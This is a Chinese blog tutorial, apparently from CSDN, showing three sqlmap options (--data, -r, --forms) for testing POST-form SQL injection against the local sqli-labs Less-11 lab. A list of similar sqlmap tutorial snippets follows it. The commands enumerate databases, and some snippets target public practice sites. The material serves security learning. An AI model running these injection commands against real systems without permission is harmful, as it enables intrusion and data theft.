针对POST型表单注入时sqlmap验证的三种参数

最新推荐文章于 2025-03-31 12:32:20 发布

看我的眼色行事

最新推荐文章于 2025-03-31 12:32:20 发布

阅读量6.4k

点赞数 5

分类专栏：工具安装与使用

本文链接：https://blog.csdn.net/weixin_44023403/article/details/115609902

版权

工具安装与使用专栏收录该内容

4 篇文章

订阅专栏

针对POST型表单注入时sqlmap验证的三种参数

一、前提
二、验证POST型表单注入的三种参数

一、前提

针对post型的表单，sqlmap有三种参数可验证：
–data 需要自己手工找到参数名以及一些信息
-r 需要自己抓包
–forms sqlmap中的自动抓包获取参数，最方便

二、验证POST型表单注入的三种参数

这里借助sqli-labs靶场的less11，来针对post表单注入，用sqlmap进行验证;
首先打开less11；
在这里插入图片描述
提交任意数据，用burp抓包；

这里可以看到post请求参数；uname=1111&passwd=11111&submit=Submit

1：–data

利用我们知道的post参数，构造下面命令；

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --data="uname=1111&passwd=11111&submit=Submit" --dbs

在这里插入图片描述

2：-r

将提交的报文抓包后，把信息存储在一个txt文件中，构造下面命令；

python sqlmap.py -r 文件路径+文件名.txt  --dbs

在这里插入图片描述

3：–forms

利用该命令，使sqlmap自己抓包，构造下面命令；

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --forms --level=5 --dbs

在这里插入图片描述

这此可见，三种方式都成功的枚举出数据库信息。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

看我的眼色行事

关注关注

5
点赞
踩
24

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【漏洞挖掘】——105、POST注入深入剖析

Fly_鹏程万里

06-21

171

POST是一种数据提交方式，它主要是指数据从客户端提交到服务器端，例如：我们常常使用的用户登录模块、网站的留言板模块等，在这些功能模块中我们提交的数据都是以POST的方式提交的服务器后再由服务器端进行验证，如果以POST提交的参数存在注入点，那么将这种注入称之为"POST"注入。

注入&Sqlmap

DebbieLi_Ca的博客

10-25

730

中心主题 sqlmap SQLMap介绍 1.Sqlmap介绍 2.Sqlmap环境安装 3.sqlmap下载 sqlmaap版本查看 sqlmap获取目标 1.sqlmap直连数据库 -d表示直连 –banner 获取banner信息 2.sqlmap URL探测 3.sqlmap文件读取目标可以探测多个URL 4.sqlmap google批量注入 sqlmap请求参数设置 Sqlmap设置HTTP方法 get和put POST在请求的时候，服

参与评论您还未登录，请先登录后发表或查看评论

sql注入漏洞--sqlmap使用

qq_43710889的博客

06-16

2955

文章目录sql注入漏洞--sqlmap使用基本流程：实战get请求命令：`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令：`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令：`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p

mysql post 注入工具_Sqlmap POST注入三种方法（转载）

weixin_39778582的博客

01-19

1193

不管怎么说？使用工具Sqlmap POST注入都会简单很多，具体说说Sqlmap POST注入三种方法吧！一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法，具体步骤如下：1、判断是否有post注入？root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示，一路回车就可以了！结果如下图：从这里，可以得...

SQL注入之sqlmap

热门推荐

lwpoor123的博客

12-24

13万+

利用sqlmap进行POST注入，常见的有三种方法: 注入方式一： 1.用Burp抓包，然后保存抓取到的内容。例如：保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注：-r表示加载一个文件，-p指定参数其中出现了三次提示: it looks l...

post方法sqlmap注入

weixin_44232532的博客

02-20

509

利用sqlmap进行POST注入 </div> 利用sqlmap进行POST注入，常见的有三种方法: 注入方式一： 1.用Burp抓包，然后保存抓取到的内容。例如：保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs注：-r表示加载一个文...

sqlmap的post注入

weixin_30662011的博客

08-25

848

目录 sqlmap的POST注入 cookie注入暴数据库 POST注入 1.验证存在注入正常数据包"cookie：user=user"修改"cookie：user=admin"后都会出现flag参数验证Cookie: user=admin’ and ‘1’=1’报错，回显没有flag，说明这种情况就存在注入 2.复制post另存为1.txt文件 ...

CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用，两种方法一道题

07-16

### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一：SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式，通过将恶意SQL代码插入应用程序接收的数据中，进而操纵...

sqlmap注入

10-26

SQLMap是一种广泛使用的开源自动化工具，专门用于检测和利用SQL注入漏洞。它的主要目标是帮助安全研究人员和渗透测试者在Web应用程序中发现和利用数据库漏洞。以下是对SQLMap注入相关知识点的详细介绍： **1. SQL...

SQLMAP 注入教程

General的 CSDN 博客

11-15

5544

SQLMAP SQLMAP是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL，Oracle，PostgreSQL，Microsoft SQL Server，Microsoft Access，IBM DB2，SQLite，Firebird，Sybase，SAP MaxDB，Informix，HSQLDB和H2数据库管理系统。当给SQLMAP这么一个url的时候，它会：判断可注入的参数判断可以用那种SQL 注入技术来注入识别出哪种数据

Sqlmap 22.05.22.03（Sqlmap请求参数设置）

辉小鱼的博客

11-05

1333

sqlmap是一款基于python编写的渗透测试工具，在sql检测和利用方面功能强大，支持多种数据库。

sqlmap post注入

zhaozhanyong的专栏

11-19

6094

0x00 常用的注入点：http://tetasp.vulnweb.com/Login.asp 几种注入方式： sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql

sqlmap使用教程(包含POST型注入方式)

weixin_73904941的博客

10-25

7709

检测注入点以及可注入类型 sqlmap -u "网址" --batch -–batch(不再询问,默认执行) 查看所有数据库 --dbs sqlmap -u "网址" --batch --dbs 查看当前使用的数据库 --current-db sqlmap -u "网址" --batch --current-db 查看表名 sqlmap -u "网址" -D security --tables --batch -D 指定数据库 --tables 列举所有表名 ....

Sqlmap————5、POST注入

Fly_鹏程万里

05-04

1350

具体流程：（1）浏览器打开目标地址http:// www.xxx.com /Login.asp（2）配置burp代理(127.0.0.1:8080)以拦截请求（3）点击login表单的submit按钮（4）这时候Burp会拦截到了我们的登录POST请求（5）把这个post请求复制为txt, 我这命名为test.txt 然后把它放至sqlmap目录下（6）运行sqlmap并执行如下命令：1、列数据库...

sqlmap注入——POST检测点方法

Xionghuimin的博客

06-03

6227

一、题目二、解题过程 2.1 在输入框输入'号，发现有错误提示，说明存在sql注入 2.2 输入数字1我们可以看到他从数据库中调出了数据，从burpsuite的抓包情况来看，提交了id1=1&submit=Submit，但是url地址栏却没有任何显示，所以是post请求（如果是get请求则会在url地址栏中显示） 2.3.1 sqlmap注入——POST检测点，将burpsuit抓包到的request请求内容复制到一个文本文件然后改名为.log后缀名的文件如下所示，然后进行注入 2.3.2

SQLMap 使用参数详解

qq_37019068的博客

10-09

2万+

SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具，在kali上已集成如果不想使用kali的话，可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注：最新版的sqlmap应该是支持python3的，但是如果python3无法使用的话可以试试切换成python2执行常见参数 -h 输出参数说明 -hh 输出详细的参数

sql注入之post 传参方式的注入

没有故事

02-27

1638

sqlmap -r ./sqlmapfile（-r 捕获的请求文件及其所在位置） -p id(加入指定参数) --cookie=""先将post请求在burp捕获，将抓到的请求内容保存到文件中，在sqlmap安装目录下面新建文本文件为x.txt。是否存在注入点，注入点在有和数据库服务器交互的地方。加入-p 指定参数 -p id。在输入框里面进行注入。

POST请求小测试（SQL注入）

Hala

03-30

2189

进入DVWA1.9，将安全防御设置为中等，进入SQL注入模拟表单可以GET也可以POST提交，但是网址栏没有变化，可得其为POST提交可以明显的看出来此页面为POST提交利用Burp来实现代理，在其上进行SQL注入步骤如下判断提交方式判断闭合符判断输入列宽度利用联合查询，查找想要的数据经判断，此页面为POST提交，因为更改表单元素时，地...

利用sqlmap扫描POST注入

12-31

### 使用 sqlmap 工具进行 POST 注入漏洞扫描为了使用 `sqlmap` 对基于 POST 请求的应用程序进行 SQL 注入测试，可以通过指定请求文件的方式来实现。具体操作方法如下：对于需要通过 POST 方法提交表单数据的情况，先准备好包含 HTTP 请求头以及 POST 数据的文本文件（例如命名为 `request.txt`），该文件的内容应模拟浏览器发送给服务器的实际请求。假设有一个登录页面接受两个字段：“username” 和 “password”。那么准备好的 `request.txt` 文件可能看起来像这样[^5]： ``` POST /login.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Content-Length: 32 username=test&password=test ``` 接着运行带有 `-r` 参数的命令来加载这个保存了完整HTTP请求的消息体文件，并让 `sqlmap` 自动检测是否存在SQL注入的可能性并尝试进一步利用它。完整的命令行指令可能是这样的: ```bash sqlmap -r request.txt --batch ``` 如果希望更精确地控制哪些部分作为潜在可注入点，则可以在上述基础上增加额外选项如 `--data` 来显式指明要测试的具体参数[^1]。另外，在某些情况下还需要提供认证凭证以便能够访问受保护资源。这时可以借助于 `--auth-cred` 及其他相关联的身份验证配置项完成身份验证过程[^3]。最后提醒一点，执行任何类型的渗透测试之前都应当获得目标系统的合法授权许可，非法入侵他人计算机信息系统属于违法行为！